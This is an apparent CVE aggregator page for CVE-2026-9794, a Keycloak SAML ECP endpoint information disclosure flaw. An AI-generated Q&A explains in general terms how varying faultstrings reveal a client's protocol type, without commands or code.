CVE-2026-9794
Information Disclosure in Keycloak via SAML ECP Endpoint
Publication date: 2026-05-28
Last updated on: 2026-05-28
Assigner: Red Hat, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| keycloak | keycloak | * |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-209 | The product generates an error message that includes sensitive information about its environment, users, or associated data. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability exists in Keycloak and involves the SAML ECP (Security Assertion Markup Language Enhanced Client or Proxy) endpoint. A remote, unauthenticated attacker can send specially crafted SOAP requests with varying client IDs to this endpoint.
By analyzing the different faultstrings returned in the responses, the attacker can determine the protocol type used by the client. This behavior leads to an information disclosure vulnerability.
How can this vulnerability impact me? :
The vulnerability allows an unauthenticated remote attacker to gain information about the client's protocol type by sending crafted requests and observing the responses.
This information disclosure could potentially be used to aid further attacks or reconnaissance against the system, although it does not directly impact integrity or availability.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by sending specially crafted SOAP requests to the SAML ECP endpoint of the Keycloak server with varying client IDs and observing the faultstrings in the responses.
By analyzing the differences in the faultstrings returned, it is possible to determine if the system is vulnerable to information disclosure.
Specific commands are not provided in the available information.